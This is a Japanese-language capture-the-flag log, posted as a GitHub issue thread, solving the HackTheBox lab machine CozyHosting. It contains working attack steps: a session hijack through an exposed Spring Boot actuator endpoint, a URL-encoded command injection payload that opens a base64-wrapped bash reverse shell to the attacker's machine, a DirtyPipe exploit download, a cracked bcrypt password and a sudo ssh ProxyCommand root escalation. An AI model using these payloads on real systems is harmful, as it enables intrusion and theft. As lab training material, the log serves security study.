search

roaris / ctf-log

0 stars 0 forks source link

HackTheBox: CozyHosting (Machine Easy) #41

Open roaris opened 1 month ago

roaris commented 1 month ago

https://app.hackthebox.com/machines/CozyHosting

$ nmap -sC -sV -Pn 10.10.11.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-15 23:46 JST
Nmap scan report for 10.10.11.230
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.78 seconds
roaris commented 1 month ago

http:\//10.10.11.230にアクセスすると、http:\//cozyhosting.htbにリダイレクトするので、/etc/hostsに以下を追記する

10.10.11.230 cozyhosting.htb
roaris commented 1 month ago

定期的にマシンに接続出来なくなってgobusterが出来ない

$ ping 10.10.11.230                                                                                                                                                          
PING 10.10.11.230 (10.10.11.230) 56(84) bytes of data.
64 bytes from 10.10.11.230: icmp_seq=1 ttl=63 time=169 ms
64 bytes from 10.10.11.230: icmp_seq=2 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=3 ttl=63 time=174 ms
64 bytes from 10.10.11.230: icmp_seq=4 ttl=63 time=173 ms
64 bytes from 10.10.11.230: icmp_seq=5 ttl=63 time=173 ms
...
64 bytes from 10.10.11.230: icmp_seq=33 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=34 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=35 ttl=63 time=169 ms
64 bytes from 10.10.11.230: icmp_seq=36 ttl=63 time=1039 ms
64 bytes from 10.10.11.230: icmp_seq=37 ttl=63 time=172 ms
64 bytes from 10.10.11.230: icmp_seq=162 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=163 ttl=63 time=169 ms
64 bytes from 10.10.11.230: icmp_seq=164 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=165 ttl=63 time=169 ms
64 bytes from 10.10.11.230: icmp_seq=166 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=167 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=168 ttl=63 time=169 ms
64 bytes from 10.10.11.230: icmp_seq=169 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=170 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=171 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=172 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=173 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=174 ttl=63 time=170 ms
^C
--- 10.10.11.230 ping statistics ---
174 packets transmitted, 50 received, 71.2644% packet loss, time 178057ms
rtt min/avg/max/mdev = 169.201/187.777/1038.978/121.606 ms
roaris commented 1 month ago

WSLを再起動したり、マシンを再起動したりしたが変わらず Pwnboxからも定期的にマシンに接続出来なくなる 昨日までこんな現象無かったんだけどな

roaris commented 1 month ago

REGENERATE VPNしたら直った

roaris commented 1 month ago

ディレクトリ探索

$ gobuster dir --url http://cozyhosting.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://cozyhosting.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 12706]
/login                (Status: 200) [Size: 4431]
/admin                (Status: 401) [Size: 97]
/logout               (Status: 204) [Size: 0]
/error                (Status: 500) [Size: 73]
/http%3A%2F%2Fwww     (Status: 400) [Size: 435]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 435]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 435]
/http%3A%2F%2Fblog    (Status: 400) [Size: 435]
/%C0                  (Status: 400) [Size: 435]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 435]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

サブドメイン探索

$ gobuster vhost --url http://cozyhosting.htb --wordlist /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://cozyhosting.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 100000 / 100001 (100.00%)
===============================================================
Finished
===============================================================

目ぼしい情報はなし

roaris commented 1 month ago

レスポンスヘッダの中にX-Powered-Byヘッダはなし POST /loginでSQLインジェクションを試したが駄目だった

ページのソースを見ても、Bootstrapが使われているということしか分からない

roaris commented 1 month ago

詰んだので、Guided Mode

Task1 : How many TCP ports are open on CozyHosting? A : 2

Task2 : The webserver on TCP port 80 issues a redirect to what domain? A : cozyhosting.htb

Task3 : What relative path on the webserver returns a 500 error? A : /error

これ着目するのか ただのエラーページとしか思ってなかった

image

Whitelabel Error Pageと書いてある

https://terakoya.sejuku.net/question/detail/32947

Whitelabel Error Pageは、Spring Bootアプリケーションでエラーページが設定されていない場合に表示されるデフォルトのエラーページです。 このエラーが表示される原因は、アプリケーションにエラーページが設定されていないことです。

らしい まあSpring Bootが使われているというのが分かるだけだと思うが、これがどう攻略に繋がるのだろうか

roaris commented 1 month ago

Task4 : What is the Java web framework used in the web application? A : Spring Boot

Task5 : What endpoint is exposed in Spring Boot and is mainly used for debugging purposes? Hint : Fuzz the endpoint using a Spring Boot specific wordlist.

Spring Bootのワードリストなんてあるのか

https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt

これを使って、gobusterを回す

$ gobuster dir --url http://cozyhosting.htb --wordlist /usr/share/SecLists/Discovery/Web-Content/spring-boot.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://cozyhosting.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/spring-boot.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/actuator             (Status: 200) [Size: 634]
/actuator/env/lang    (Status: 200) [Size: 487]
/actuator/env/home    (Status: 200) [Size: 487]
/actuator/env         (Status: 200) [Size: 4957]
/actuator/env/path    (Status: 200) [Size: 487]
/actuator/health      (Status: 200) [Size: 15]
/actuator/mappings    (Status: 200) [Size: 9938]
/actuator/beans       (Status: 200) [Size: 127224]
/actuator/sessions    (Status: 200) [Size: 48]
Progress: 112 / 113 (99.12%)
===============================================================
Finished
===============================================================

/actuator/sessionsを見ると、セッションIDらしきものが書いてある image

CookieのJSESSIONIDをこのセッションIDらしきものに書き換えて、http:\//cozyhosting.htb/loginにアクセスすると、http:\//cozyhosting.htb/adminにアクセス出来た

image

A : /actuator 問題の答えは、/actuatorだった

image

roaris commented 1 month ago

コマンドを実行したり、スクリプトを埋め込むような箇所はない

gobusterで見つかったURLを調べてると、/actuator/mappingsの中のPOST /executesshという部分が気になったけど、どういうリクエスト送ればよいのか分からない image

/actuator/beansは色々書いてあるが、versionで検索かけてもSprint Bootのバージョンは見つからなかった

POST /executesshはhttp:\//cozyhosting.htb/adminのInclude host into automatic patchingの箇所から送信されるリクエストだった host=example.com&username=kanderson を送信 → ssh: Could not resolve hostname example.com: Temporary failure in name resolution と表示される host=127.0.0.1&username=kanderson を送信 → Host key verification failed. と表示される

For Cozy Scanner to connect the private key that you received upon registration should be included in your host's .ssh/authorised_keys file. って書いてあるけど、.ssh/authorized_keysの間違い?あと、.ssh/authorized_keysなら秘密鍵じゃなくて、公開鍵を登録する場所なんだよな

roaris commented 1 month ago

また詰んだので、Guided Mode Task6 : What is the username of the user's whose session is exposed? A : kanderson

Task7 : When a POST request is sent to /executessh, which of the two parameters is vulnerable to command injection? Hint : The injection is blind, use out-of-band techniques like sleep or making the target connect to your box.

POST /executessh コマンドインジェクション出来るのか それどうやって気づくんだ

https://0xdf.gitlab.io/2024/03/02/htb-cozyhosting.html#command-injection

Based on the error message, and that it said it’s using a private key, it seems likely that the server is running ssh -i [key] [username]@[hostname] to connect. If that’s the case, I can test for command injection vulnerabilities.

まあ言われればそうかという感じだけど自力では出てこない

roaris commented 1 month ago

sleepさせることで、コマンドインジェクションが出来ないかのチェックをする

host=127.0.0.1%3Bsleep+5%3B%23&username=kanderson (host : 127.0.0.1;sleep 5;#, username : kanderson) を送信 → Invalid hostname! となる host=a&username=kanderson%40127.0.0.1%3Bsleep+5%3B%23 を送信 (host : a, username : kanderson@127.0.0.1;sleep 5;#) → Username can't contain whitespaces! となる

https://0xdf.gitlab.io/2024/03/02/htb-cozyhosting.html#command-injection

There are a couple ways to get whitespace without spaces in a Linux terminal context. I’ll use ${IFS} as a Bash environment variable that is a space

${IFS}というのがあるのか

host=a&username=kanderson%40127.0.0.1%3Bsleep%24%7BIFS%7D5%3B%23 (host : a, username : kanderson@127.0.0.1;sleep${IFS}5;#) を送信 → スリープした後にHost key verification failed. と表示される

Task7 : When a POST request is sent to /executessh, which of the two parameters is vulnerable to command injection? Hint : The injection is blind, use out-of-band techniques like sleep or making the target connect to your box. A : username

roaris commented 1 month ago

リバースシェルを取る host=a&username=kanderson%40127.0.0.1%3Bbash%24%7BIFS%7D-i%24%7BIFS%7D%3E%26%24%7BIFS%7D%2Fdev%2Ftcp%2F10.10.14.50%2F4444%24%7BIFS%7D0%3E%261%3B%23 (host : a, username : kanderson@127.0.0.1;bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.10.14.50/4444${IFS}0>&1;#)を送信するが、上手くいかない http://cozyhosting.htb/admin?error=Host key verification failed./bin/bash: line 1: ${IFS}/dev/tcp/10.10.14.50/4444${IFS}0: ambiguous redirectにリダイレクトして、400が返ってくる

ambiguous redirectとは...

roaris commented 1 month ago

https://medium.com/@aniketdas07770/hackthebox-cozyhosting-writeup-61e832873e68 ambiguous redirectは謎だけど、base64を使うと上手くいくらしい

$ echo "bash -i >& /dev/tcp/10.10.14.50/4444 0>&1" | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK

host=a&username=kanderson%40127.0.0.1%3becho%24%7bIFS%7d%22YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA%2bJjEK%22%7cbase64%24%7bIFS%7d-d%7cbash%3b%23 (host : a, username : kanderson@127.0.0.1;echo${IFS}"YmFzaCAtaSA JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA JjEK"|base64${IFS}-d|bash;#) を送信

$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from cozyhosting.htb [10.10.11.230] 57028
bash: cannot set terminal process group (1066): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$

リバースシェルが取れた

roaris commented 1 month ago

/home/joshには移動出来ない

app@cozyhosting:/app$ ls -l /home
ls -l /home
total 4
drwxr-x--- 3 josh josh 4096 Aug  8  2023 josh

/var/wwwに気になるものはなし

app@cozyhosting:/app$ ls -al /var/www
ls -al /var/www
total 12
drwxr-xr-x  3 root root 4096 May  9  2023 .
drwxr-xr-x 13 root root 4096 Aug 14  2023 ..
drwxr-xr-x  2 root root 4096 May  9  2023 html

sudo -lも出てこない

app@cozyhosting:/app$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

CVE-2022-0847が使えそう? https://security.sios.jp/vulnerability/kernel-security-vulnerability-20220309/

app@cozyhosting:/app$ uname -sr
uname -sr
Linux 5.15.0-82-generic
roaris commented 1 month ago

https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits を見つけた コンパイルしないといけないけど、マシン側にgccがない kali linux側でコンパイルしたものをマシン側に持ってきて動かした /appにはファイルを作成出来なかったので、/tmpに置いている

app@cozyhosting:/tmp$ wget http://10.10.14.50:8000/exploit-2
wget http://10.10.14.50:8000/exploit-2
--2024-05-16 19:20:17--  http://10.10.14.50:8000/exploit-2
Connecting to 10.10.14.50:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17288 (17K) [application/octet-stream]
Saving to: ‘exploit-2’

     0K .......... ......                                     100% 97.1K=0.2s

2024-05-16 19:20:18 (97.1 KB/s) - ‘exploit-2’ saved [17288/17288]

app@cozyhosting:/tmp$ chmod +x exploit-2
chmod +x exploit-2
app@cozyhosting:/tmp$ ./exploit-2 /usr/bin/sudo
./exploit-2 /usr/bin/sudo
usage: sudo -h | -K | -k | -V
usage: sudo -v [-ABknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-ABknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
            [command]
usage: sudo [-ABbEHknPS] [-r role] [-t type] [-C num] [-D directory] [-g group]
            [-h host] [-p prompt] [-R directory] [-T timeout] [-u user]
            [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-ABknS] [-r role] [-t type] [-C num] [-D directory] [-g group]
            [-h host] [-p prompt] [-R directory] [-T timeout] [-u user] file ...
sh: 1: /tmp/sh: not found
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))

使い方がよく分からない

roaris commented 1 month ago

詰んだので、Guided Mode Task8 : What user is the web application running as? A : app

Task9 : What is the full path to the Java file that runs the web application? Hint : It should be very close to where our reverse shell starts. A : /app/cloudhosting-0.0.1.jar

Task10 : What is the name of the file where application-related properties are stored in a Spring Boot application?

jarはjava archiveの略 https://wa3.i-3-i.info/word14171.html jarの解凍はjar -xvf <jarファイル>とするらしい マシン側にjarコマンドがなかった python3コマンドならあるので、python3 -m http.serverでローカルに持ってきて解凍する

roaris commented 1 month ago

passwordでgrepすると、application.propertieというファイルがヒットした

server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

Task10 : What is the name of the file where application-related properties are stored in a Spring Boot application? A : application.properties

roaris commented 1 month ago

psqlコマンドで接続する https://www.tohoho-web.com/ex/postgresql.html#psql シェルの安定化をしておく

app@cozyhosting:/app$ psql -h localhost -U postgres -d postgres
Password for user postgres:
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

postgres=#

postgresデータベースにテーブルはないらしい

postgres=# \dt
Did not find any relations.
postgres=# \l
WARNING: terminal is not fully functional
Press RETURN to continue
                                   List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privil
eges
-------------+----------+----------+-------------+-------------+----------------
-------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres
      +
             |          |          |             |             | postgres=CTc/po
stgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres
      +
             |          |          |             |             | postgres=CTc/po
stgres
(4 rows)

(END)

\lを打つと、シェルが固まったので、やり直す

app@cozyhosting:/app$ psql -h localhost -U postgres -d cozyhosting
Password for user postgres:
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

cozyhosting=# \dt
WARNING: terminal is not fully functional
Press RETURN to continue
         List of relations
 Schema | Name  | Type  |  Owner
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
(2 rows)

(END)

usersテーブルがあることが分かった またシェルが固まったのでやり直す

roaris commented 1 month ago 
app@cozyhosting:/app$ psql -h localhost -U postgres -d cozyhosting
Password for user postgres:
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

cozyhosting=# select * from users;
WARNING: terminal is not fully functional
Press RETURN to continue
   name    |                           password                           | role

-----------+--------------------------------------------------------------+-----
--
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admi
n
(2 rows)

(END)

bcryptでハッシュ化されているので、john the ripperを使って元のパスワードに戻す kandersonの元のパスワードは出てこなかったが、adminの元のパスワードは分かった

$ cat hash.txt
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
1g 0:00:00:12 DONE (2024-05-17 05:06) 0.07806g/s 224.8p/s 224.8c/s 224.8C/s onlyme..soccer9
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
roaris commented 1 month ago

sshログイン出来ない admin / root / administrator / Admin を試したが...

joshらしい

$ ssh josh@10.10.11.230
josh@10.10.11.230's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu May 16 08:06:29 PM UTC 2024

  System load:           0.0
  Usage of /:            53.5% of 5.42GB
  Memory usage:          26%
  Swap usage:            0%
  Processes:             266
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.230
  IPv6 address for eth0: dead:beef::250:56ff:feb9:14f3

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Aug 29 09:03:34 2023 from 10.10.14.41
josh@cozyhosting:~$
roaris commented 1 month ago

user.txtをゲット

josh@cozyhosting:~$ ls
user.txt
josh@cozyhosting:~$ cat user.txt
47f348e35478a293fdaa86ceb1547e9f
roaris commented 1 month ago

/usr/bin/sshがroot権限で実行可能だけど、これでrootのシェルを取るとか出来なくない?

josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
roaris commented 1 month ago

ProxyCommandを使うらしい https://0xdf.gitlab.io/2024/03/02/htb-cozyhosting.html#execution 踏み台サーバを跨いで直接ssh接続をするときに使う https://dev.classmethod.jp/articles/direct-ssh-by-proxycommand/

roaris commented 1 month ago

sudo ssh -oProxyCommand='/bin/bash' a ではシェルが反応しない ホスト名のところがaになっているが、今回はProxyCommandが実行出来れば良いので、適当にしている

/bin/bashにsetuidをつけて実行しても、joshユーザで謎

josh@cozyhosting:~$ sudo ssh -oProxyCommand='chmod u+s /bin/bash' a
kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
josh@cozyhosting:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
josh@cozyhosting:~$ /bin/bash
bash-5.1$ whoami
josh
bash-5.1$ cd /root
bash: cd: /root: Permission denied

pオプションをつけてbashを起動すると、rootで起動された pオプション調べても出てこない root.txtゲット

josh@cozyhosting:~$ /bin/bash -p
bash-5.1# whoami
root
bash-5.1# cd /root
bash-5.1# ls
root.txt
bash-5.1# cat root.txt
6086562917fcf0eaa68f81a71ab3cf4a
roaris commented 1 month ago

解き方まとめ

  1. Whitelabel Error PageからSpring Bootが使われていると気付く
  2. Spring Bootのワードリストを使って、ディレクトリ探索をする
  3. /actuator/sessionsに書かれているセッションIDを使って、/adminにアクセス
  4. POST /executesshでOSコマンドインジェクションしてリバースシェルを実行 /executesshという名前からsshコマンドが実行されていると推測する スペースを含めるとエラーになるので、${IFS}を使う リバースシェルを実行しようとすると、ambiguous redirectという謎エラーが発生するが、base64を使うと上手くいく
  5. マシン側の/appにあるjarファイルをローカルに持ってきて、解凍する
  6. passwordでgrepして、PostgreSQLの認証情報を見つける
  7. シェルの安定化をして、PostgreSQLにアクセス
  8. DBの中にbcryptでハッシュ化されたパスワードがあるので、john the ripperで元のパスワードを特定して、joshでsshログイン user.txtゲット
  9. sudo -lして、sshコマンドがroot権限で実行可能
  10. sshのProxyCommandを使って/bin/bashにsetuidをつけて、bash -pをすることで、rootに権限昇格 (-pをつけないと、joshのまま)

自力で解ける気がしない 特に4が厳しすぎる